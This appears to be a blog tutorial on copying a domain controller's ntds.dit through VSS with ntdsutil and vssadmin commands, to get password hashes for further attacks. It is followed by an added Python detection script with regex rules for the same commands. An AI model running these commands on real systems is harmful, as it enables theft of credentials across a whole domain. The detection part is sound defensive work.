This blog introduces and summarizes several ways to obtain the ntds.dit file via VSS, which is preinstalled in Windows, and then to decrypt the file to obtain the password hashes, which can be used in further attacks. As a result, the blog comprises two parts. I use the following two blogs by 3gstudent and ropnop for reference.
Export the NTDS.dit via VSS
VSS, short for Volume Shadow Copy Service, is used to create manual or automatic backup copies of volumes even while they are in use. It provides a set of COM interfaces that implement a framework allowing volume backups to be performed while applications on the system continue to write to the volumes.
Step 1: Acquire the ntds.dit
Method 1: ntdsutil
- list snapshots:
ntdsutil snapshot "List All" quit quit
- create snapshot:
ntdsutil snapshot "activate instance ntds" create quit quit
- load the snapshot:
ntdsutil snapshot "mount {ef0cadb1-a0f0-46c2-a4de-d6faaef0e199}" quit quit
- copy ntds.dit:
copy C:\$SNAP_201810291848_VOLUMEC$\windows\NTDS\ntds.dit c:\ntds.dit
- unload the snapshot:
ntdsutil snapshot "unmount {ef0cadb1-a0f0-46c2-a4de-d6faaef0e199}" quit quit
- delete the snapshot:
ntdsutil snapshot "delete {ef0cadb1-a0f0-46c2-a4de-d6faaef0e199}" quit quit
Method 2: vssadmin
Supported on Windows 2008 or later; Administrator privilege is required.
- search current existing shadow:
vssadmin list shadows
- create the shadow:
vssadmin create shadow /for=c:
- copy ntds.dit:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\windows\NTDS\ntds.dit c:\ntds.dit
- delete the shadow:
vssadmin delete shadows /for=c: /quiet
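From the defender's side, every step above leaves a process-creation trail: `vssadmin create shadow`, `ntdsutil snapshot ...`, and a `copy` whose source path lives under `HarddiskVolumeShadowCopy<n>` or `$SNAP_<timestamp>_VOLUME<drive>$` and ends in `ntds.dit`. The script below is an added example (not code from the original post or from the referenced blogs) that runs those patterns over a handful of constructed, hypothetical process-creation events flattened to a `host|user|image|command_line` format, and raises the per-host verdict when shadow creation and an ntds.dit copy from a shadow path appear on the same host. The rule names, the log format, and the sample events are all assumptions made for the example.

```python
import re
from collections import defaultdict

# Constructed sample events (hypothetical Sysmon/4688-style data flattened to
# "host|user|image|command_line"). They mirror the steps shown in the post.
SAMPLE_EVENTS = [
    r"dc01|CORP\jdoe|C:\Windows\System32\vssadmin.exe|vssadmin list shadows",
    r"dc01|CORP\jdoe|C:\Windows\System32\vssadmin.exe|vssadmin create shadow /for=c:",
    r"dc01|CORP\jdoe|C:\Windows\System32\cmd.exe|copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\windows\NTDS\ntds.dit c:\ntds.dit",
    r'dc01|CORP\jdoe|C:\Windows\System32\ntdsutil.exe|ntdsutil snapshot "activate instance ntds" create quit quit',
    r'dc01|CORP\jdoe|C:\Windows\System32\ntdsutil.exe|ntdsutil snapshot "mount {GUID-PLACEHOLDER}" quit quit',
    r'dc02|CORP\svc_backup|C:\Windows\System32\ntdsutil.exe|ntdsutil snapshot "List All" quit quit',
    r"ws07|CORP\alice|C:\Windows\System32\notepad.exe|notepad report.txt",
    r"dc01|NT AUTHORITY\SYSTEM|C:\Windows\System32\vssadmin.exe|vssadmin list writers",
]

# Detection rules, one per technique step. The names are assumptions for this example.
RULES = [
    # Enumerating existing shadows: low signal on its own, but part of the sequence.
    ("vss_shadow_enum", re.compile(r"\bvssadmin(\.exe)?\s+list\s+shadows", re.I)),
    # Creating a shadow copy with vssadmin (Method 2).
    ("vss_shadow_create", re.compile(r"\bvssadmin(\.exe)?\s+create\s+shadow", re.I)),
    # Any use of the ntdsutil snapshot subcommand (Method 1: list/create/mount/unmount/delete).
    ("ntdsutil_snapshot", re.compile(r"\bntdsutil(\.exe)?\s+snapshot\b", re.I)),
    # ntds.dit read from a shadow path: either the \\?\GLOBALROOT device path
    # used with vssadmin or the $SNAP_..._VOLUMEC$ mount point created by ntdsutil.
    ("ntds_copy_from_shadow",
     re.compile(r"(HarddiskVolumeShadowCopy\d+|\$SNAP_\d+_VOLUME[A-Z]\$).*ntds\.dit", re.I)),
]


def parse_event(line):
    """Split one flattened event into its four fields."""
    host, user, image, cmd = line.split("|", 3)
    return {"host": host, "user": user, "image": image, "cmd": cmd}


def classify(cmd):
    """Return the names of all rules whose pattern matches the command line."""
    return [name for name, rx in RULES if rx.search(cmd)]


def analyze(lines):
    """Tag each event and derive a per-host verdict.

    high:   a shadow was created (vssadmin or ntdsutil) AND ntds.dit was copied
            out of a shadow path on the same host
    medium: ntdsutil snapshot activity or an ntds.dit copy from a shadow path alone
    low:    only shadow enumeration or shadow creation (routine backup noise)
    """
    hits = []
    per_host = defaultdict(set)
    for line in lines:
        ev = parse_event(line)
        tags = classify(ev["cmd"])
        if tags:
            hits.append((ev["host"], ev["user"], tags, ev["cmd"]))
            per_host[ev["host"]].update(tags)

    verdicts = {}
    for host, tags in per_host.items():
        snapshot_made = bool({"vss_shadow_create", "ntdsutil_snapshot"} & tags)
        if snapshot_made and "ntds_copy_from_shadow" in tags:
            verdicts[host] = "high"
        elif "ntds_copy_from_shadow" in tags or "ntdsutil_snapshot" in tags:
            verdicts[host] = "medium"
        else:
            verdicts[host] = "low"
    return hits, verdicts


if __name__ == "__main__":
    hits, verdicts = analyze(SAMPLE_EVENTS)
    for host, user, tags, cmd in hits:
        print(f"{host} {user} {','.join(tags)} :: {cmd}")
    for host, level in verdicts.items():
        print(f"verdict {host}: {level}")
```

The correlation step matters more than any single pattern: backup software legitimately creates shadows, so `vss_shadow_create` alone is noise, but a shadow creation followed by an `ntds.dit` read from the shadow path on the same host is the sequence this post describes and is worth an alert. In production the same logic would run over Sysmon Event ID 1 or Security Event ID 4688 with command-line auditing enabled, keyed on the domain controllers.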